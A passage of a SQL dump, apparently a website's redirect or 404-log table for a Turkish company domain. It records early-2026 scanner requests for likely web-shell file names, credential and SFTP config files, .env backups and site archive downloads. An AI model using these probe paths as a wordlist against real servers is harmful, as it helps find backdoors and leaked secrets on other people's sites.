18:03:40','0000-00-00 00:00:00',301),(56531,'http://mail.3s-technologies.com.tr/tr/ho/wpup.php',NULL,'','',5,0,'2026-01-26 23:52:23','0000-00-00 00:00:00',301),(56532,'http://mail.3s-technologies.com.tr/tr/hey.php',NULL,'','',5,0,'2026-01-26 23:52:26','0000-00-00 00:00:00',301),(56533,'http://mail.3s-technologies.com.tr/tr/rip.php',NULL,'','',40,0,'2026-01-26 23:52:49','0000-00-00 00:00:00',301),(56534,'http://mail.3s-technologies.com.tr/tr/wp4.php',NULL,'','',7,0,'2026-01-26 23:52:50','0000-00-00 00:00:00',301),(56535,'http://3s-technologies.com.tr/tr/~norapump/hah.php',NULL,'','',11,0,'2026-01-27 00:18:33','0000-00-00 00:00:00',301),(56536,'http://3s-technologies.com.tr/tr/skin/install/default/security.php',NULL,'','',11,0,'2026-01-27 00:18:43','0000-00-00 00:00:00',301),(56537,'http://3s-technologies.com.tr/tr/wp/wp-includes/index.php',NULL,'','',11,0,'2026-01-27 00:18:50','0000-00-00 00:00:00',301),(56538,'http://3s-technologies.com.tr/tr/wp-includes/ixr/moon.php',NULL,'','',12,0,'2026-01-27 00:18:54','0000-00-00 00:00:00',301),(56539,'http://3s-technologies.com.tr/tr/.trash7309/fafa',NULL,'','',11,0,'2026-01-27 00:19:11','0000-00-00 00:00:00',301),(56540,'http://3s-technologies.com.tr/tr/museu/yhweq.php',NULL,'','',11,0,'2026-01-27 00:19:14','0000-00-00 00:00:00',301),(56541,'http://3s-technologies.com.tr/tr/ho/wpup.php',NULL,'','',14,0,'2026-01-27 00:19:18','0000-00-00 00:00:00',301),(56542,'http://3s-technologies.com.tr/tr/wp-content/plugins/achdxhv/languages/admin.php',NULL,'','',11,0,'2026-01-27 00:19:34','0000-00-00 00:00:00',301),(56543,'http://3s-technologies.com.tr/tr/wp4.php',NULL,'','',14,0,'2026-01-27 00:19:38','0000-00-00 00:00:00',301),(56544,'http://3s-technologies.com.tr/tr/oivcl.php',NULL,'','',11,0,'2026-01-27 00:19:41','0000-00-00 00:00:00',301),(56545,'http://3s-technologies.com.tr/tr/.cache/x.php',NULL,'','',11,0,'2026-01-27 00:19:46','0000-00-00 00:00:00',301),(56546,'http://3s-technologies.com.tr/tr/dr.php',NULL,'','',19,0,'2026-01-27 00:19:46','0000-00-00 00:00:00',301),(56547,'http://3s-technologies.com.tr/tr/admin-filters.php',NULL,'','',5,0,'2026-01-27 01:43:02','0000-00-00 00:00:00',301),(56548,'http://3s-technologies.com.tr/tr/fileupload.php',NULL,'','',3,0,'2026-01-27 01:43:08','0000-00-00 00:00:00',301),(56549,'http://3s-technologies.com.tr/tr/xqp.php',NULL,'','',1,0,'2026-01-27 01:43:09','0000-00-00 00:00:00',301),(56550,'http://3s-technologies.com.tr/tr/info_php.php',NULL,'','',1,0,'2026-01-27 01:43:47','0000-00-00 00:00:00',301),(56551,'http://3s-technologies.com.tr/tr/wp-includes/text/xwx1.php',NULL,'','',4,0,'2026-01-27 01:43:48','0000-00-00 00:00:00',301),(56552,'http://3s-technologies.com.tr/tr/farah.php',NULL,'','',1,0,'2026-01-27 01:43:50','0000-00-00 00:00:00',301),(56553,'http://3s-technologies.com.tr/tr/iqb.php',NULL,'','',1,0,'2026-01-27 01:44:19','0000-00-00 00:00:00',301),(56554,'http://3s-technologies.com.tr/tr/jcibmxqm.php?fox=d3wl7',NULL,'','',1,0,'2026-01-27 01:44:33','0000-00-00 00:00:00',301),(56555,'http://3s-technologies.com.tr/tr/jmealhny.php?fox=d3wl7',NULL,'','',1,0,'2026-01-27 01:44:34','0000-00-00 00:00:00',301),(56556,'http://3s-technologies.com.tr/tr/ftp/accounts_ftp.json',NULL,'','',1,0,'2026-01-28 20:33:15','0000-00-00 00:00:00',301),(56557,'http://3s-technologies.com.tr/tr/.vscode/sftp.json.save',NULL,'','',1,0,'2026-01-28 20:33:17','0000-00-00 00:00:00',301),(56558,'http://3s-technologies.com.tr/tr/.vscode/sftp.json~',NULL,'','',1,0,'2026-01-28 20:33:17','0000-00-00 00:00:00',301),(56559,'http://3s-technologies.com.tr/tr/.vscode/sftp-config.json',NULL,'','',1,0,'2026-01-28 20:33:18','0000-00-00 00:00:00',301),(56560,'http://3s-technologies.com.tr/tr/.vscode/sftp-config.save',NULL,'','',1,0,'2026-01-28 20:33:19','0000-00-00 00:00:00',301),(56561,'http://3s-technologies.com.tr/tr/.vscode/sftp-config~',NULL,'','',1,0,'2026-01-28 20:33:20','0000-00-00 00:00:00',301),(56562,'http://mail.3s-technologies.com.tr/tr/999.php',NULL,'','',1,0,'2026-01-29 01:44:38','0000-00-00 00:00:00',301),(56563,'http://3s-technologies.com.tr/tr/wp-json/wc/v3',NULL,'http://3s-technologies.com.tr/wp-json/wc/v3','',1,0,'2026-01-29 11:49:51','0000-00-00 00:00:00',301),(56564,'https://mail.3s-technologies.com.tr/tr/wp-json/wc/v3',NULL,'https://mail.3s-technologies.com.tr/wp-json/wc/v3','',1,0,'2026-01-29 11:53:18','0000-00-00 00:00:00',301),(56565,'https://mail.3s-technologies.com.tr/tr/wp-json',NULL,'https://mail.3s-technologies.com.tr/wp-json/','',1,0,'2026-01-29 11:53:19','0000-00-00 00:00:00',301),(56566,'https://www.3s-technologies.com.tr/tr/wp-json/wc/v3',NULL,'https://www.3s-technologies.com.tr/wp-json/wc/v3','',1,0,'2026-01-29 11:57:14','0000-00-00 00:00:00',301),(56567,'https://www.3s-technologies.com.tr/tr/wp-json',NULL,'https://www.3s-technologies.com.tr/wp-json/','',1,0,'2026-01-29 11:57:16','0000-00-00 00:00:00',301),(56568,'http://3s-technologies.com.tr/tr/baidu.php',NULL,'','',3,0,'2026-01-29 17:36:04','0000-00-00 00:00:00',301),(56569,'http://3s-technologies.com.tr/tr/xfile25.php',NULL,'','',9,0,'2026-01-29 17:36:04','0000-00-00 00:00:00',301),(56570,'http://3s-technologies.com.tr/tr/zi-136.php',NULL,'','',1,0,'2026-01-29 17:36:05','0000-00-00 00:00:00',301),(56571,'http://3s-technologies.com.tr/tr/aurax.php',NULL,'','',1,0,'2026-01-29 17:36:10','0000-00-00 00:00:00',301),(56572,'http://3s-technologies.com.tr/tr/xmff.php',NULL,'','',3,0,'2026-01-29 17:36:11','0000-00-00 00:00:00',301),(56573,'http://3s-technologies.com.tr/tr/tourpa.php',NULL,'','',2,0,'2026-01-29 17:36:12','0000-00-00 00:00:00',301),(56574,'http://3s-technologies.com.tr/tr/x5fcs.php',NULL,'','',1,0,'2026-01-29 17:36:15','0000-00-00 00:00:00',301),(56575,'http://3s-technologies.com.tr/tr/jsond.php',NULL,'','',18,0,'2026-01-29 17:36:16','0000-00-00 00:00:00',301),(56576,'http://3s-technologies.com.tr/tr/ph33w.php',NULL,'','',7,0,'2026-01-29 17:36:19','0000-00-00 00:00:00',301),(56577,'http://3s-technologies.com.tr/tr/wwx.php',NULL,'','',10,0,'2026-01-29 17:36:22','0000-00-00 00:00:00',301),(56578,'http://3s-technologies.com.tr/tr/413.php',NULL,'','',1,0,'2026-01-29 17:36:24','0000-00-00 00:00:00',301),(56579,'http://3s-technologies.com.tr/tr/z9v.php',NULL,'','',1,0,'2026-01-29 17:36:26','0000-00-00 00:00:00',301),(56580,'http://3s-technologies.com.tr/tr/thebe.php',NULL,'','',13,0,'2026-01-29 17:36:27','0000-00-00 00:00:00',301),(56581,'http://3s-technologies.com.tr/tr/ccs.php',NULL,'','',41,0,'2026-01-29 17:36:30','0000-00-00 00:00:00',301),(56582,'http://3s-technologies.com.tr/tr/sad5.php',NULL,'','',1,0,'2026-01-29 17:36:31','0000-00-00 00:00:00',301),(56583,'http://3s-technologies.com.tr/tr/xvde.php',NULL,'','',1,0,'2026-01-29 17:36:32','0000-00-00 00:00:00',301),(56584,'http://3s-technologies.com.tr/tr/f355.php',NULL,'','',3,0,'2026-01-29 17:36:34','0000-00-00 00:00:00',301),(56585,'http://3s-technologies.com.tr/tr/xpwer1.php',NULL,'','',12,0,'2026-01-29 17:36:43','0000-00-00 00:00:00',301),(56586,'http://3s-technologies.com.tr/tr/wp-admin/images/commentv.php',NULL,'','',9,0,'2026-01-29 17:36:45','0000-00-00 00:00:00',301),(56587,'http://3s-technologies.com.tr/tr/admin.php/admin.php',NULL,'','',2,0,'2026-01-29 17:36:48','0000-00-00 00:00:00',301),(56588,'http://3s-technologies.com.tr/tr/jane.php',NULL,'','',9,0,'2026-01-29 17:37:24','0000-00-00 00:00:00',301),(56589,'http://3s-technologies.com.tr/tr/about.php/about.php',NULL,'','',1,0,'2026-01-29 17:38:03','0000-00-00 00:00:00',301),(56590,'http://3s-technologies.com.tr/tr/temp.php/wp-update.php',NULL,'','',1,0,'2026-01-29 17:38:31','0000-00-00 00:00:00',301),(56591,'http://3s-technologies.com.tr/tr/class-admin.php',NULL,'','',1,0,'2026-01-29 17:38:47','0000-00-00 00:00:00',301),(56592,'http://3s-technologies.com.tr/tr/nyan.php',NULL,'','',16,0,'2026-01-29 17:38:48','0000-00-00 00:00:00',301),(56593,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/index.php',NULL,'','',24,0,'2026-01-30 04:24:04','0000-00-00 00:00:00',301),(56594,'http://3s-technologies.com.tr/tr/sanity.php',NULL,'','',1,0,'2026-01-30 08:40:13','0000-00-00 00:00:00',301),(56595,'http://3s-technologies.com.tr/tr/anj.php',NULL,'','',1,0,'2026-01-30 08:40:13','0000-00-00 00:00:00',301),(56596,'http://3s-technologies.com.tr/tr/aboutc.php',NULL,'','',23,0,'2026-01-30 08:40:15','0000-00-00 00:00:00',301),(56597,'http://3s-technologies.com.tr/tr/zmia.php',NULL,'','',4,0,'2026-01-30 08:40:16','0000-00-00 00:00:00',301),(56598,'http://3s-technologies.com.tr/tr/edorxrr.php',NULL,'','',4,0,'2026-01-30 08:40:17','0000-00-00 00:00:00',301),(56599,'http://3s-technologies.com.tr/tr/doko.php',NULL,'','',2,0,'2026-01-30 08:40:17','0000-00-00 00:00:00',301),(56600,'http://3s-technologies.com.tr/tr/nlvbr.php',NULL,'','',1,0,'2026-01-30 08:40:20','0000-00-00 00:00:00',301),(56601,'http://3s-technologies.com.tr/tr/ah25.php',NULL,'','',33,0,'2026-01-30 08:40:20','0000-00-00 00:00:00',301),(56602,'http://3s-technologies.com.tr/tr/icoxp.php',NULL,'','',1,0,'2026-01-30 08:40:21','0000-00-00 00:00:00',301),(56603,'http://3s-technologies.com.tr/tr/tempae.php',NULL,'','',4,0,'2026-01-30 08:40:24','0000-00-00 00:00:00',301),(56604,'http://3s-technologies.com.tr/tr/drfabyqp.php',NULL,'','',1,0,'2026-01-30 08:40:24','0000-00-00 00:00:00',301),(56605,'http://3s-technologies.com.tr/tr/bayss.php',NULL,'','',5,0,'2026-01-30 08:40:26','0000-00-00 00:00:00',301),(56606,'http://3s-technologies.com.tr/tr/w1.php',NULL,'','',2,0,'2026-01-30 08:40:27','0000-00-00 00:00:00',301),(56607,'http://3s-technologies.com.tr/tr/dgdaolin.php',NULL,'','',1,0,'2026-01-30 08:40:28','0000-00-00 00:00:00',301),(56608,'http://3s-technologies.com.tr/tr/rrhbdzdz.php',NULL,'','',1,0,'2026-01-30 08:40:28','0000-00-00 00:00:00',301),(56609,'https://3s-technologies.com.tr/en/wp-content/plugins/index.php',NULL,'www.google.com','',1,0,'2026-01-30 16:31:28','0000-00-00 00:00:00',301),(56610,'http://mail.3s-technologies.com.tr/tr/gettest.php',NULL,'','',54,0,'2026-01-30 21:21:14','0000-00-00 00:00:00',301),(56611,'http://mail.3s-technologies.com.tr/tr/obfuscate.php',NULL,'','',1,0,'2026-01-30 21:21:17','0000-00-00 00:00:00',301),(56612,'http://mail.3s-technologies.com.tr/tr/iswfg.php',NULL,'','',1,0,'2026-01-30 21:21:20','0000-00-00 00:00:00',301),(56613,'http://mail.3s-technologies.com.tr/tr/black.php',NULL,'','',6,0,'2026-01-30 21:21:23','0000-00-00 00:00:00',301),(56614,'http://mail.3s-technologies.com.tr/tr/wikindex.php',NULL,'','',3,0,'2026-01-30 21:21:24','0000-00-00 00:00:00',301),(56615,'http://mail.3s-technologies.com.tr/tr/tool.php',NULL,'','',26,0,'2026-01-30 21:21:25','0000-00-00 00:00:00',301),(56616,'http://mail.3s-technologies.com.tr/tr/py.php',NULL,'','',1,0,'2026-01-30 21:21:26','0000-00-00 00:00:00',301),(56617,'http://mail.3s-technologies.com.tr/tr/sym404.php',NULL,'','',1,0,'2026-01-30 21:21:28','0000-00-00 00:00:00',301),(56618,'http://mail.3s-technologies.com.tr/tr/gfd.php',NULL,'','',22,0,'2026-01-30 21:21:32','0000-00-00 00:00:00',301),(56619,'http://mail.3s-technologies.com.tr/tr/bnm.php',NULL,'','',19,0,'2026-01-30 21:21:33','0000-00-00 00:00:00',301),(56620,'http://mail.3s-technologies.com.tr/tr/edit-tags.php',NULL,'','',9,0,'2026-01-30 21:21:34','0000-00-00 00:00:00',301),(56621,'http://mail.3s-technologies.com.tr/tr/lkj.php',NULL,'','',3,0,'2026-01-30 21:21:36','0000-00-00 00:00:00',301),(56622,'http://mail.3s-technologies.com.tr/tr/global.php',NULL,'','',9,0,'2026-01-30 21:21:56','0000-00-00 00:00:00',301),(56623,'http://mail.3s-technologies.com.tr/tr/core.php',NULL,'','',15,0,'2026-01-30 21:21:57','0000-00-00 00:00:00',301),(56624,'http://mail.3s-technologies.com.tr/tr/irc.js.php',NULL,'','',1,0,'2026-01-30 21:21:59','0000-00-00 00:00:00',301),(56625,'http://mail.3s-technologies.com.tr/tr/neshe.php',NULL,'','',1,0,'2026-01-31 03:37:49','0000-00-00 00:00:00',301),(56626,'http://mail.3s-technologies.com.tr/tr/wp-site.php',NULL,'','',3,0,'2026-01-31 03:37:50','0000-00-00 00:00:00',301),(56627,'http://mail.3s-technologies.com.tr/tr/environment.php',NULL,'','',15,0,'2026-01-31 03:37:51','0000-00-00 00:00:00',301),(56628,'http://mail.3s-technologies.com.tr/tr/wp-themes.php',NULL,'','',2,0,'2026-01-31 03:37:58','0000-00-00 00:00:00',301),(56629,'http://mail.3s-technologies.com.tr/tr/indeex.php',NULL,'','',3,0,'2026-01-31 03:38:00','0000-00-00 00:00:00',301),(56630,'http://mail.3s-technologies.com.tr/tr/503.php',NULL,'','',4,0,'2026-01-31 03:38:02','0000-00-00 00:00:00',301),(56631,'http://mail.3s-technologies.com.tr/tr/html.php',NULL,'','',2,0,'2026-01-31 03:38:03','0000-00-00 00:00:00',301),(56632,'http://mail.3s-technologies.com.tr/tr/custom-background.php',NULL,'','',2,0,'2026-01-31 03:38:04','0000-00-00 00:00:00',301),(56633,'http://mail.3s-technologies.com.tr/tr/xmrlpc.php',NULL,'','',17,0,'2026-01-31 03:38:05','0000-00-00 00:00:00',301),(56634,'http://mail.3s-technologies.com.tr/tr/css/radio.php',NULL,'','',4,0,'2026-01-31 03:38:08','0000-00-00 00:00:00',301),(56635,'http://mail.3s-technologies.com.tr/tr/server.php',NULL,'','',2,0,'2026-01-31 03:38:21','0000-00-00 00:00:00',301),(56636,'http://mail.3s-technologies.com.tr/tr/editor.php',NULL,'','',2,0,'2026-01-31 03:38:37','0000-00-00 00:00:00',301),(56637,'http://mail.3s-technologies.com.tr/tr/backup.php',NULL,'','',6,0,'2026-01-31 03:38:48','0000-00-00 00:00:00',301),(56638,'http://mail.3s-technologies.com.tr/tr/dev1s.php',NULL,'','',8,0,'2026-01-31 03:38:53','0000-00-00 00:00:00',301),(56639,'http://mail.3s-technologies.com.tr/tr/zr.php',NULL,'','',3,0,'2026-01-31 03:38:53','0000-00-00 00:00:00',301),(56640,'http://mail.3s-technologies.com.tr/tr/panel.php',NULL,'','',2,0,'2026-01-31 03:38:58','0000-00-00 00:00:00',301),(56641,'http://mail.3s-technologies.com.tr/tr/okxh.php',NULL,'','',13,0,'2026-01-31 03:39:03','0000-00-00 00:00:00',301),(56642,'http://mail.3s-technologies.com.tr/tr/ar/mgsl.php',NULL,'','',2,0,'2026-01-31 03:39:09','0000-00-00 00:00:00',301),(56643,'http://mail.3s-technologies.com.tr/tr/assets/as.php',NULL,'','',2,0,'2026-01-31 03:39:10','0000-00-00 00:00:00',301),(56644,'http://mail.3s-technologies.com.tr/tr/wp-content/lock360.php',NULL,'','',3,0,'2026-01-31 03:39:18','0000-00-00 00:00:00',301),(56645,'http://mail.3s-technologies.com.tr/tr/includes/phpinfo.php',NULL,'','',3,0,'2026-01-31 03:39:21','0000-00-00 00:00:00',301),(56646,'http://mail.3s-technologies.com.tr/tr/mk.php',NULL,'','',5,0,'2026-01-31 03:39:21','0000-00-00 00:00:00',301),(56647,'http://mail.3s-technologies.com.tr/tr/zoo.php',NULL,'','',12,0,'2026-01-31 03:39:22','0000-00-00 00:00:00',301),(56648,'http://mail.3s-technologies.com.tr/tr/js/sxx.php',NULL,'','',2,0,'2026-01-31 03:39:25','0000-00-00 00:00:00',301),(56649,'http://mail.3s-technologies.com.tr/tr/mode.php',NULL,'','',12,0,'2026-01-31 03:39:25','0000-00-00 00:00:00',301),(56650,'http://mail.3s-technologies.com.tr/tr/docs.php',NULL,'','',2,0,'2026-01-31 03:39:26','0000-00-00 00:00:00',301),(56651,'http://mail.3s-technologies.com.tr/tr/ioxi001.php7',NULL,'','',5,0,'2026-01-31 03:39:28','0000-00-00 00:00:00',301),(56652,'http://mail.3s-technologies.com.tr/tr/wp-tot.php',NULL,'','',5,0,'2026-01-31 03:39:29','0000-00-00 00:00:00',301),(56653,'http://mail.3s-technologies.com.tr/tr/mah/xbrain.php',NULL,'','',2,0,'2026-01-31 03:39:31','0000-00-00 00:00:00',301),(56654,'http://mail.3s-technologies.com.tr/tr/ans.php',NULL,'','',2,0,'2026-01-31 03:39:32','0000-00-00 00:00:00',301),(56655,'http://mail.3s-technologies.com.tr/tr/fileupload.php',NULL,'','',2,0,'2026-01-31 03:39:35','0000-00-00 00:00:00',301),(56656,'http://mail.3s-technologies.com.tr/tr/ran.php',NULL,'','',2,0,'2026-01-31 03:39:36','0000-00-00 00:00:00',301),(56657,'http://mail.3s-technologies.com.tr/tr/set.php',NULL,'','',5,0,'2026-01-31 03:39:37','0000-00-00 00:00:00',301),(56658,'http://mail.3s-technologies.com.tr/tr/bs2.php',NULL,'','',3,0,'2026-01-31 03:39:37','0000-00-00 00:00:00',301),(56659,'http://mail.3s-technologies.com.tr/tr/pegi.php8',NULL,'','',2,0,'2026-01-31 03:39:38','0000-00-00 00:00:00',301),(56660,'http://mail.3s-technologies.com.tr/tr/retu11.php7',NULL,'','',7,0,'2026-01-31 03:39:56','0000-00-00 00:00:00',301),(56661,'http://www.3s-technologies.com.tr/tr/rip.php',NULL,'','',15,0,'2026-01-31 14:38:03','0000-00-00 00:00:00',301),(56662,'http://3s-technologies.com.tr/tr/ws55.php',NULL,'','',1,0,'2026-01-31 17:34:45','0000-00-00 00:00:00',301),(56663,'http://3s-technologies.com.tr/tr/ws53.php',NULL,'','',6,0,'2026-01-31 17:34:46','0000-00-00 00:00:00',301),(56664,'http://3s-technologies.com.tr/tr/bk.php',NULL,'','',14,0,'2026-01-31 17:34:46','0000-00-00 00:00:00',301),(56665,'http://3s-technologies.com.tr/tr/soniau.php',NULL,'','',3,0,'2026-01-31 17:34:48','0000-00-00 00:00:00',301),(56666,'http://3s-technologies.com.tr/tr/clasa992.php',NULL,'','',1,0,'2026-01-31 17:34:50','0000-00-00 00:00:00',301),(56667,'http://3s-technologies.com.tr/tr/wp-webdb.php',NULL,'','',1,0,'2026-01-31 17:34:51','0000-00-00 00:00:00',301),(56668,'http://3s-technologies.com.tr/tr/tracke.php',NULL,'','',1,0,'2026-01-31 17:34:53','0000-00-00 00:00:00',301),(56669,'http://3s-technologies.com.tr/tr/un.php',NULL,'','',16,0,'2026-01-31 17:34:53','0000-00-00 00:00:00',301),(56670,'http://3s-technologies.com.tr/tr/ftde.php',NULL,'','',25,0,'2026-01-31 17:34:54','0000-00-00 00:00:00',301),(56671,'http://3s-technologies.com.tr/tr/revealability.php',NULL,'','',19,0,'2026-01-31 17:34:55','0000-00-00 00:00:00',301),(56672,'http://3s-technologies.com.tr/tr/zlxoczuu.php',NULL,'','',1,0,'2026-01-31 17:34:55','0000-00-00 00:00:00',301),(56673,'http://3s-technologies.com.tr/tr/.env/.env.bak',NULL,'','',2,0,'2026-01-31 19:38:32','0000-00-00 00:00:00',301),(56674,'http://3s-technologies.com.tr/tr/2026.php',NULL,'','',9,0,'2026-02-01 11:01:00','0000-00-00 00:00:00',301),(56675,'http://3s-technologies.com.tr/tr/muzu.php',NULL,'','',23,0,'2026-02-01 11:01:01','0000-00-00 00:00:00',301),(56676,'http://3s-technologies.com.tr/tr/tphp.php',NULL,'','',9,0,'2026-02-01 11:01:12','0000-00-00 00:00:00',301),(56677,'http://3s-technologies.com.tr/tr/www.3s-technologies.zip',NULL,'','',1,0,'2026-02-01 20:13:16','0000-00-00 00:00:00',301),(56678,'https://3s-technologies.com.tr/tr/backup.tar.gz',NULL,'','',1,0,'2026-02-01 20:13:16','0000-00-00 00:00:00',301),(56679,'http://3s-technologies.com.tr/tr/old.tar.gz',NULL,'','',1,0,'2026-02-01 20:13:19','0000-00-00 00:00:00',301),(56680,'http://3s-technologies.com.tr/tr/backup.tgz',NULL,'','',1,0,'2026-02-01 20:13:19','0000-00-00 00:00:00',301),(56681,'https://3s-technologies.com.tr/tr/old.tar.gz',NULL,'','',1,0,'2026-02-01 20:13:20','0000-00-00 00:00:00',301),(56682,'http://3s-technologies.com.tr/tr/htdocs.zip',NULL,'','',1,0,'2026-02-01 20:13:20','0000-00-00 00:00:00',301),(56683,'https://3s-technologies.com.tr/tr/public.zip',NULL,'','',1,0,'2026-02-01 20:13:20','0000-00-00 00:00:00',301),(56684,'http://3s-technologies.com.tr/tr/www.3s-technologies.tar.gz',NULL,'','',1,0,'2026-02-01 20:13:21','0000-00-00 00:00:00',301),(56685,'https://3s-technologies.com.tr/tr/site.zip',NULL,'','',1,0,'2026-02-01 20:13:22','0000-00-00 00:00:00',301),(56686,'https://3s-technologies.com.tr/tr/web.zip',NULL,'','',1,0,'2026-02-01 20:13:22','0000-00-00 00:00:00',301),(56687,'https://3s-technologies.com.tr/tr/www.3s-technologies.tar.gz',NULL,'','',1,0,'2026-02-01 20:13:23','0000-00-00 00:00:00',301),(56688,'https://3s-technologies.com.tr/tr/www.3s-technologies.zip',NULL,'','',1,0,'2026-02-01 20:13:23','0000-00-00 00:00:00',301),(56689,'http://mail.3s-technologies.com.tr/tr/166.php',NULL,'','',49,0,'2026-02-02 11:34:58','0000-00-00 00:00:00',301),(56690,'http://mail.3s-technologies.com.tr/tr/2026.php',NULL,'','',3,0,'2026-02-02 11:34:59','0000-00-00 00:00:00',301),(56691,'http://mail.3s-technologies.com.tr/tr/muzu.php',NULL,'','',6,0,'2026-02-02 11:35:00','0000-00-00 00:00:00',301),(56692,'http://mail.3s-technologies.com.tr/tr/reze.php',NULL,'','',10,0,'2026-02-02 11:35:01','0000-00-00 00:00:00',301),(56693,'http://mail.3s-technologies.com.tr/tr/jsond.php',NULL,'','',5,0,'2026-02-02 11:35:02','0000-00-00 00:00:00',301),(56694,'http://mail.3s-technologies.com.tr/tr/tphp.php',NULL,'','',3,0,'2026-02-02 11:35:12','0000-00-00 00:00:00',301),(56695,'http://mail.3s-technologies.com.tr/tr/nyan.php',NULL,'','',5,0,'2026-02-02 11:35:14','0000-00-00 00:00:00',301),(56696,'http://3s-technologies.com.tr/tr/obfuscate.php',NULL,'','',4,0,'2026-02-02 20:02:32','0000-00-00 00:00:00',301),(56697,'http://3s-technologies.com.tr/tr/iswfg.php',NULL,'','',1,0,'2026-02-02 20:02:35','0000-00-00 00:00:00',301),(56698,'http://3s-technologies.com.tr/tr/vjooe.php',NULL,'','',1,0,'2026-02-02 20:02:36','0000-00-00 00:00:00',301),(56699,'http://3s-technologies.com.tr/tr/py.php',NULL,'','',1,0,'2026-02-02 20:02:38','0000-00-00 00:00:00',301),(56700,'http://3s-technologies.com.tr/tr/gfd.php',NULL,'','',25,0,'2026-02-02 20:02:41','0000-00-00 00:00:00',301),(56701,'http://3s-technologies.com.tr/tr/bnm.php',NULL,'','',30,0,'2026-02-02 20:02:42','0000-00-00 00:00:00',301),(56702,'http://3s-technologies.com.tr/tr/lkj.php',NULL,'','',3,0,'2026-02-02 20:02:44','0000-00-00 00:00:00',301),(56703,'http://3s-technologies.com.tr/tr/irc.js.php',NULL,'','',1,0,'2026-02-02 20:02:59','0000-00-00 00:00:00',301),(56704,'http://3s-technologies.com.tr/tr/environment.php',NULL,'','',20,0,'2026-02-02 22:43:39','0000-00-00 00:00:00',301),(56705,'http://3s-technologies.com.tr/tr/styles.php',NULL,'','',7,0,'2026-02-02 22:44:36','0000-00-00 00:00:00',301),(56706,'http://3s-technologies.com.tr/tr/yr.php',NULL,'','',2,0,'2026-02-02 22:44:57','0000-00-00 00:00:00',301),(56707,'http://3s-technologies.com.tr/tr/includes/phpinfo.php',NULL,'','',3,0,'2026-02-02 22:45:04','0000-00-00 00:00:00',301),(56708,'http://3s-technologies.com.tr/tr/mk.php',NULL,'','',6,0,'2026-02-02 22:45:05','0000-00-00 00:00:00',301),(56709,'http://3s-technologies.com.tr/tr/js/sxx.php',NULL,'','',3,0,'2026-02-02 22:45:08','0000-00-00 00:00:00',301),(56710,'http://3s-technologies.com.tr/tr/mah/xbrain.php',NULL,'','',3,0,'2026-02-02 22:45:16','0000-00-00 00:00:00',301),(56711,'http://3s-technologies.com.tr/tr/set.php',NULL,'','',7,0,'2026-02-02 22:45:24','0000-00-00 00:00:00',301),(56712,'http://3s-technologies.com.tr/tr/pegi.php8',NULL,'','',2,0,'2026-02-02 22:45:26','0000-00-00 00:00:00',301),(56713,'https://3s-technologies.com.tr/en/magento_version',NULL,'https://3s-technologies.com.tr/magento_version','',1,0,'2026-02-03 13:22:04','0000-00-00 00:00:00',301),(56714,'https://3s-technologies.com.tr/en/release_notes.txt',NULL,'https://3s-technologies.com.tr/RELEASE_NOTES.txt','',1,0,'2026-02-03 13:22:05','0000-00-00 00:00:00',301),(56715,'http://mail.3s-technologies.com.tr/tr/bk.php',NULL,'','',7,0,'2026-02-03 19:37:14','0000-00-00 00:00:00',301),(56716,'http://3s-technologies.com.tr/tr/wp-includes/ms-blogs-query.php',NULL,'','',1,0,'2026-02-04 11:06:56','0000-00-00 00:00:00',301),(56717,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/zhvzntc.php',NULL,'','',1,0,'2026-02-04 11:06:57','0000-00-00 00:00:00',301),(56718,'http://3s-technologies.com.tr/tr/wp-admin/images/tgfvoen.php',NULL,'','',1,0,'2026-02-04 11:06:58','0000-00-00 00:00:00',301),(56719,'http://3s-technologies.com.tr/tr/wp-admin/images/bo.php',NULL,'','',1,0,'2026-02-04 11:06:59','0000-00-00 00:00:00',301),(56720,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/she.php',NULL,'','',1,0,'2026-02-04 11:07:00','0000-00-00 00:00:00',301),(56721,'http://3s-technologies.com.tr/tr/wp-content/plugins/jlvhys97/milo.php',NULL,'','',1,0,'2026-02-04 11:07:00','0000-00-00 00:00:00',301),(56722,'http://3s-technologies.com.tr/tr/jlvhys97.php',NULL,'','',1,0,'2026-02-04 11:07:01','0000-00-00 00:00:00',301),(56723,'http://3s-technologies.com.tr/tr/wp-content/themes/gw9hpuea/milo.php',NULL,'','',1,0,'2026-02-04 11:07:02','0000-00-00 00:00:00',301),(56724,'http://3s-technologies.com.tr/tr/wp-content/plugins/gw9hpuea/milo.php',NULL,'','',1,0,'2026-02-04 11:07:03','0000-00-00 00:00:00',301),(56725,'http://3s-technologies.com.tr/tr/gw9hpuea.php',NULL,'','',1,0,'2026-02-04 11:07:04','0000-00-00 00:00:00',301),(56726,'http://3s-technologies.com.tr/tr/wp-content/themes/pt2o2j0b/milo.php',NULL,'','',1,0,'2026-02-04 11:07:05','0000-00-00 00:00:00',301),(56727,'http://3s-technologies.com.tr/tr/wp-content/themes/5undryfb/milo.php',NULL,'','',1,0,'2026-02-04 11:07:05','0000-00-00 00:00:00',301),(56728,'http://3s-technologies.com.tr/tr/wp-content/plugins/5undryfb/milo.php',NULL,'','',1,0,'2026-02-04 11:07:06','0000-00-00 00:00:00',301),(56729,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/.well-known/pki-validation/xmrlpc.php',NULL,'','',1,0,'2026-02-04 11:07:11','0000-00-00 00:00:00',301),(56730,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/classsmtps.php',NULL,'','',1,0,'2026-02-04 11:07:12','0000-00-00 00:00:00',301),(56731,'http://3s-technologies.com.tr/tr/wp-includes/class-flitert.php',NULL,'','',1,0,'2026-02-04 11:07:14','0000-00-00 00:00:00',301),(56732,'http://3s-technologies.com.tr/tr/gallery_upload.php',NULL,'','',1,0,'2026-02-04 11:07:23','0000-00-00 00:00:00',301),(56733,'http://3s-technologies.com.tr/tr/wp-includes/vjgtd8lw.php',NULL,'','',1,0,'2026-02-04 11:07:24','0000-00-00 00:00:00',301),(56734,'http://3s-technologies.com.tr/tr/wp-includes/alfadata/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-02-04 11:07:33','0000-00-00 00:00:00',301),(56735,'http://3s-technologies.com.tr/tr/dashboard.php',NULL,'','',1,0,'2026-02-04 11:07:44','0000-00-00 00:00:00',301),(56736,'http://3s-technologies.com.tr/tr/millo.php',NULL,'','',1,0,'2026-02-04 11:07:45','0000-00-00 00:00:00',301),(56737,'http://3s-technologies.com.tr/tr/new/millo.php',NULL,'','',1,0,'2026-02-04 11:07:46','0000-00-00 